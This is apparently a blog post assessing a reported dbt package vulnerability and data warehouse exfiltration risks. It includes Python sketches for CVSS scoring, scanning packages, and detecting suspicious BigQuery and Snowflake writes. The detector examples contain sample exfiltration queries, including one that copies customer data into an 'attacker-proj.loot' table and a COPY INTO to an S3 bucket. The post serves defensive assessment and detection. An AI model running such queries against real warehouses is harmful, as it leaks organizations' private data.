In light of the recent publication of a dbt vulnerability, what are the risks and security implications of using dbt packages, and what is the real data breach risk in your data platform?

On May 3rd, the dbt team opened an issue on the Elementary dbt package repository to notify us of a planned breaking change. Two months later, we learned what led to this change, when Paul Brabban published a post titled “Are you at risk from this critical dbt vulnerability?”.

A headline like that can definitely make you sit up and take notice, especially since it came not long after reports of a significant Snowflake breach. We got tons of questions from Elementary users following this post and the change dbt deployed. Before we all start panicking, let’s dive into the context and implications of this alleged critical dbt vulnerability.



Following a discussion on the dbt Slack, I want to break down my take on it, what it means for companies using dbt, and security practices in your data platform as a whole.

Think of it as turning a potential "oh no" moment into a chance to level up our data game and understand the security aspects of it.

I’m a security expert and dbt package maintainer

As someone who knows how sensitive data is for our customers, I get it – security issues are no joke. I know firsthand how serious security vulnerabilities are: my background is in security research, and before starting Elementary I led cybersecurity incident response engagements at an elite security consulting firm.

For more than 4 years I was knee-deep in investigating and responding to attacks on various companies, including Fortune 500 companies, that resulted in millions of dollars in damages. Many of these attacks involved malicious access to databases and data exfiltration.

All of these organizations invested heavily in data protection and followed security best practices. So why were they still vulnerable? Because ultimately, security involves making tradeoffs.

Tradeoffs between usability, resources, and security

I often tell customers they can achieve a data platform without data issues. Easily. Don’t ingest new data, and don’t build any new data pipelines and products. If you actually leverage data, you are bound to have problems.

Security is the same. If you try to create a fully secure system, it will probably also be unusable and irrelevant.

Zooming in on data platforms: it is probably safer not to give ingestion tools like Fivetran, Stitch, and Airbyte credentials to read sensitive data from all of our internal databases and third-party vendors. It also isn’t the best idea in the world to give a BI tool access to read and store all of our data.

But we do it because otherwise, we couldn’t create a useful data platform with reasonable resources. Some will decide to invest in risk reduction, like paying for an on-prem deployment. But these are still tradeoffs between usability, resources, and security.

In theory, your data platform can be a silo, without interfaces open to users and vendors. It might not have vulnerabilities, but will it still be useful and valuable?

So should we just give up and accept it? Of course not.

Our focus should be on understanding whether we have critical vulnerabilities.

What makes a vulnerability critical?

There is a standard for scoring the severity of vulnerabilities, the Common Vulnerability Scoring System (CVSS), which assigns a score from 0.1 to 10; a score of 9 to 10 means a critical vulnerability. It takes several factors into account, which I can simplify into two questions: how likely is an attacker to exploit the vulnerability, and what would the impact be?
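For reference, the CVSS v3.x specification maps numeric scores to qualitative ratings: None (0.0), Low (0.1 to 3.9), Medium (4.0 to 6.9), High (7.0 to 8.9), and Critical (9.0 to 10.0). The short Python sketch below simply encodes that table; the function name `cvss_severity` is an illustrative choice, not part of any CVSS tooling.

```python
def cvss_severity(score: float) -> str:
    """Map a CVSS v3.x score to its qualitative severity rating."""
    if not 0.0 <= score <= 10.0:
        raise ValueError(f"CVSS scores range from 0.0 to 10.0, got {score}")
    if score == 0.0:
        return "None"
    if score < 4.0:
        return "Low"
    if score < 7.0:
        return "Medium"
    if score < 9.0:
        return "High"
    return "Critical"  # 9.0 to 10.0


for example in (3.1, 6.5, 8.8, 9.8):
    print(example, cvss_severity(example))
```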

dbt packages - security implications and the recently published vulnerability

I’m no vulnerability scoring professional, but I’ll share my humble opinion as one of the developers of a very popular dbt package and a former security expert.

Yes, I’m finally addressing the reported vulnerability.

Public dbt packages are open-source code packages you can import into your dbt project. Once you import a package, it becomes part of your code base. Importing external packages is a common practice in software development, and it introduces security risks.

In dbt packages specifically, the package's code is often executed by default as part of your dbt commands. This means code written by the package creators (and contributors) runs as part of your dbt runs, with the permissions of dbt’s production user.

This is the vulnerability described in the post. The scenario in the post describes a malicious override of a materialization. The change introduced in dbt 1.8 is that overriding a materialization from a package now requires a flag, but there are various other ways to exploit this. If the package includes hooks or models, they will be executed unless you explicitly exclude them. If the package introduces macros that override dbt’s default ones (as with materializations), the package macros will be executed.
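To make this concrete, here is a minimal, heuristic Python sketch of a pre-adoption check: it walks a downloaded package directory and lists places where package code may run during your dbt commands, namely materialization blocks, hook keywords, and model files. The names `scan_dbt_package` and `Finding`, the regex patterns, and the assumption that models live under the default `models/` path are all illustrative assumptions. It does not detect macro overrides, and it does not replace actually reading the code.

```python
import re
from dataclasses import dataclass
from pathlib import Path

# Heuristic patterns: a match means "review this file", not "this is malicious".
MATERIALIZATION_RE = re.compile(r"\{%-?\s*materialization\s+(\w+)")
HOOK_RE = re.compile(r"\b(on-run-start|on-run-end|pre[-_]hook|post[-_]hook)\b")


@dataclass
class Finding:
    path: str    # file path relative to the package root
    kind: str    # "materialization", "hook", or "model"
    detail: str  # matched name or keyword


def scan_dbt_package(root: Path) -> list[Finding]:
    """Flag package files that may execute SQL during your dbt runs."""
    findings: list[Finding] = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix not in {".sql", ".yml", ".yaml"}:
            continue
        rel = path.relative_to(root).as_posix()
        text = path.read_text(encoding="utf-8", errors="replace")
        # Materializations defined by the package (custom or overriding).
        for match in MATERIALIZATION_RE.finditer(text):
            findings.append(Finding(rel, "materialization", match.group(1)))
        # Hook keywords in dbt_project.yml, YAML properties, or model configs.
        for match in HOOK_RE.finditer(text):
            findings.append(Finding(rel, "hook", match.group(1)))
        # Assumes the default "models/" path; packages can configure others.
        if path.suffix == ".sql" and rel.startswith("models/"):
            findings.append(Finding(rel, "model", path.stem))
    return findings
```

For example, after `dbt deps` you might call `scan_dbt_package(Path("dbt_packages/<package_name>"))` and read every flagged file by hand before the package reaches production.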

But here is some important context: what code can be included in and executed by a dbt package? Only valid SQL commands that the user running dbt is permitted to run.

In the attack scenario from the post, the malicious materialization code includes a SQL command that writes the victim's tables to a public BigQuery project. This is exfiltration of private data, which makes it a full data breach attack vector.

Is this dbt package vulnerability critical? Not on its own

What will need to happen for an attacker to exploit this vulnerability on your data platform?

- Including malicious code in a dbt package - The attacker will need to contribute malicious code to a public dbt package, or publish a new dbt package:

  - Creating a new dbt package - High effort - it will require building enough value that users actually download it.

  - Making a contribution - The malicious code will need to pass the review of the package maintainers.

- The package will need to be accepted to dbt Hub - Similar to other hubs, dbt doesn’t guarantee package security.

- A user would need to download the malicious package and deploy it to production - Different organizations have different policies here. Can any user introduce any package? Will it run in dev first? Who needs to approve this step?

- The dbt user running the package will need permission to execute the malicious command:

  - In my opinion, this is the most important piece. The permissions will determine the potential impact of the attack.

Let’s evaluate using CVSS metrics, addressing probability and impact:

Exploit probability

- Local attack vector - This means no network access. The attacker will at no point gain direct access to the data warehouse; the attack relies on code that is executed locally.

- Required user interaction - At the very least, the attacker relies on a user to download the package. More likely, the attack also relies on package maintainers to accept the contribution, and on someone other than that user to approve deploying the package to production.

- High attack complexity - Defined as “A successful attack depends on conditions beyond the attacker's control”. In this case, those conditions are the required user interactions and the permissions of the dbt user.

These factors make the vulnerability's exploitability low.
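To illustrate how these factors combine, the Python sketch below implements the CVSS v3.1 base score formula for the Scope: Unchanged case only. The article specifies the attack vector (Local), attack complexity (High), and user interaction (Required); the other metrics in the example vectors (no privileges required, and the confidentiality, integrity, and availability impacts) are assumptions made purely for illustration, so the outputs are not an official score for this vulnerability.

```python
import math

# CVSS v3.1 metric weights; PR weights below are the Scope: Unchanged values.
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
PR = {"N": 0.85, "L": 0.62, "H": 0.27}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}


def roundup(value: float) -> float:
    """CVSS v3.1 Roundup: smallest one-decimal number >= value."""
    int_input = round(value * 100_000)
    if int_input % 10_000 == 0:
        return int_input / 100_000
    return (math.floor(int_input / 10_000) + 1) / 10


def base_score(vector: str) -> float:
    """Base score for a vector such as 'AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N'."""
    m = dict(part.split(":") for part in vector.split("/"))
    if m.get("S", "U") != "U":
        raise NotImplementedError("this sketch only handles Scope: Unchanged")
    iss = 1 - (1 - CIA[m["C"]]) * (1 - CIA[m["I"]]) * (1 - CIA[m["A"]])
    impact = 6.42 * iss
    exploitability = 8.22 * AV[m["AV"]] * AC[m["AC"]] * PR[m["PR"]] * UI[m["UI"]]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


# Assumed vector: confidentiality impact only (data is read and exfiltrated).
print(base_score("AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"))  # 4.7
# Same exploitability, but a dbt user that can also modify and delete data.
print(base_score("AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"))  # 7.0
# For comparison: a network-reachable, no-interaction, full-impact flaw.
print(base_score("AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"))  # 9.8
```

Under these assumed metrics, the exploitability factors keep the score well below the Critical band, and the score moves mainly with the impact metrics, which in practice are set by what the dbt user is permitted to do.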

But what will determine the impact?

The answer is the complicated, borderline impossible-to-understand permissions structure of your data warehouse.

Data warehouse permissions - the real vulnerability in your stack

In the scenario described in the post, the dbt user has permission to write the organization's private data to a public BigQuery project.

By default, any user with read access to the data can do this. I know, this is crazy.

This is a known vulnerability.

Known to whom? To BigQuery.



Their paid threat detection service will alert you to such actions as potential “BigQuery data exfiltration”.

This default policy can be changed, of course. How? If you have a few days to kill and amazing patience, you can dig through the BigQuery documentation. Luckily, Paul published a guide.
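Alongside changing the policy, one practical check is to scan the SQL your dbt user actually ran (for example, the `query` column of BigQuery's `INFORMATION_SCHEMA.JOBS` views) for writes to fully qualified tables in projects you don't own, and for `EXPORT DATA` statements. The Python sketch below is a heuristic under stated assumptions: the function name and the allowlist of project IDs are hypothetical, and the regex only recognizes `project.dataset.table` targets written as one unquoted or backtick-quoted path.

```python
import re

# Heuristic: statements that write to a fully qualified table, for example
# CREATE TABLE `project.dataset.table` or INSERT INTO project.dataset.table.
WRITE_TARGET_RE = re.compile(
    r"\b(?:create\s+(?:or\s+replace\s+)?(?:temp(?:orary)?\s+)?table"
    r"(?:\s+if\s+not\s+exists)?|insert\s+(?:into\s+)?|merge\s+(?:into\s+)?)"
    r"\s*`?([a-z0-9-]+)\.([\w-]+)\.([\w-]+)`?",
    re.IGNORECASE,
)
# EXPORT DATA writes query results to external storage such as Cloud Storage.
EXPORT_RE = re.compile(r"\bexport\s+data\b", re.IGNORECASE)


def suspicious_bigquery_writes(sql: str, own_projects: set[str]) -> list[str]:
    """Return write targets outside own_projects (lowercase project IDs)."""
    flagged = []
    for match in WRITE_TARGET_RE.finditer(sql):
        project, dataset, table = match.groups()
        if project.lower() not in own_projects:
            flagged.append(f"{project}.{dataset}.{table}")
    if EXPORT_RE.search(sql):
        flagged.append("EXPORT DATA")
    return flagged


# Hypothetical project IDs, for illustration only.
query = (
    "CREATE OR REPLACE TABLE `attacker-proj.loot.customers` AS "
    "SELECT * FROM `my-proj.analytics.customers`"
)
print(suspicious_bigquery_writes(query, {"my-proj"}))
# ['attacker-proj.loot.customers']
```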

Is data exfiltration this easy only in BigQuery? No.

The same tradeoff between usability and security applies when data warehouses add features. In an effort to make data sharing and management easier, they introduced vulnerabilities like this one.

For example, Snowflake supports `COPY INTO` external locations. I assume many teams run their production dbt project with a user that has the privileges to do so. An attacker could add a hook to a package that runs `COPY INTO` to unload your tables to their own S3 bucket.

A quick search led me to a recent Mandiant report on the Snowflake breach they investigated. `COPY INTO` external storage was the exact technique the attacker used for exfiltration. Adding new external storage requires high privileges, but the attacker was also seen listing the existing external storage locations. It’s likely that some of these were publicly accessible, allowing the attacker to exfiltrate data without even adding new external storage.
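A similar heuristic can flag the Snowflake techniques described here in query text, for example from the `QUERY_TEXT` column of `SNOWFLAKE.ACCOUNT_USAGE.QUERY_HISTORY`: `COPY INTO` an inline cloud storage URL or a stage (an unload, as opposed to `COPY INTO <table>`, which loads), stage creation, and `SHOW STAGES`. This is a hypothetical Python sketch rather than a vetted detection rule; it also flags unloads to internal stages, so expect some benign matches.

```python
import re

# COPY INTO <location> unloads data (to a stage or a cloud storage URL);
# COPY INTO <table> loads data, so it is not matched here.
UNLOAD_RE = re.compile(
    r"\bcopy\s+into\s+('(?:s3|s3gov|gcs|azure)://[^']*'|@[\w.$/~%-]+)",
    re.IGNORECASE,
)
# Creating stages, or listing existing ones, can precede an unload.
STAGE_RE = re.compile(
    r"\b(create\s+(?:or\s+replace\s+)?(?:temp(?:orary)?\s+)?stage|show\s+stages)\b",
    re.IGNORECASE,
)


def flag_snowflake_query(query_text: str) -> list[str]:
    """Return human-readable reasons a query deserves review (heuristic)."""
    reasons = [f"unload to {m.group(1)}" for m in UNLOAD_RE.finditer(query_text)]
    for m in STAGE_RE.finditer(query_text):
        # Normalize case and whitespace, e.g. "SHOW  STAGES" -> "show stages".
        reasons.append(" ".join(m.group(1).lower().split()))
    return reasons


# Hypothetical bucket name, for illustration only.
print(flag_snowflake_query("COPY INTO 's3://example-bucket/dump/' FROM analytics.customers"))
# ["unload to 's3://example-bucket/dump/'"]
```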

I know what you must be thinking.

Why is this a vulnerability and not a permission and data warehouse management issue?

In my opinion, it comes down to the huge impact of these misconfigurations.

The platforms don’t make it easy to avoid such errors, their defaults are too permissive, and they don’t add safety mechanisms.

This makes exploiting such misconfigurations both probable and impactful.

That is the definition of a critical security vulnerability.

Should users be fully responsible for those risks?

Think about your banking app and how it balances security and usability.

Does your bank expect you to be fully responsible for risks?

When you make a large money transfer to another account, 2FA is probably required. We accept this inconvenience as users. Because this is a high-risk action, we even expect it to include additional safeguards. The responsibility for security isn't only on us as users.

Why shouldn't we expect the same from our data platform?

Time will tell, but I expect that, following the Snowflake breach, data warehouse vendors will make significant changes to their permissions and security operations.

Bottom line and recommendations

The dbt package vulnerability by itself is almost meaningless. I would argue that the benefits of external code packages in dbt development, just like in software development, justify the risk.

In fact, there are various other attack vectors for code execution on the data warehouse: packages of non-dbt code that run commands (Python / Java), malicious contributions to open-source orchestrators (Airflow, Prefect, Dagster), attacks on a vendor that has access to the DWH, or, easiest of all, stealing credentials from someone in your organization. I have investigated hundreds of attacks, and this is the most common attack vector.

What should you do?

Focus on reducing the impact of malicious code execution by enforcing strict permissions and network policies.

If you want to reduce your exposure to dbt package risks specifically:

- Download packages only from trusted maintainers with good reputations.

- Create a review process for introducing packages:

  - Define who can authorize adding new packages.

  - Run new packages in dev without access to production data, and check the query history to see what the package actually executes.

- Keep the permissions of your dbt user to a minimum.
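For the query history check in dev, one approach is to run the same dbt command with and without the new package and diff the two query histories. The Python sketch below, with hypothetical function names, does an order-preserving multiset difference after stripping block comments (such as the query comment dbt adds by default), masking string literals, and normalizing whitespace and case. How you export each run's query texts from your warehouse is left as an assumption.

```python
import re
from collections import Counter


def normalize(query: str) -> str:
    """Canonical form used to compare query texts across runs."""
    query = re.sub(r"/\*.*?\*/", " ", query, flags=re.DOTALL)  # block comments
    query = re.sub(r"'(?:[^']|'')*'", "'?'", query)  # mask string literals
    return " ".join(query.split()).lower()


def queries_added_by_package(baseline: list[str], with_package: list[str]) -> list[str]:
    """Queries from the run with the package that the baseline run did not issue."""
    remaining = Counter(normalize(q) for q in baseline)
    added = []
    for query in with_package:
        key = normalize(query)
        if remaining[key] > 0:
            remaining[key] -= 1  # consume one matching baseline occurrence
        else:
            added.append(query)
    return added


# Hypothetical query texts, for illustration only.
baseline = ["create table dev.a as select 1"]
with_package = ["CREATE TABLE dev.a AS SELECT 1", "COPY INTO 's3://example-bucket/x/' FROM dev.a"]
print(queries_added_by_package(baseline, with_package))
# ["COPY INTO 's3://example-bucket/x/' FROM dev.a"]
```

Anything returned is SQL that only appeared once the package was installed and deserves a manual read. Queries that embed run-specific values outside string literals (for example, numeric IDs) will still show up as differences.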
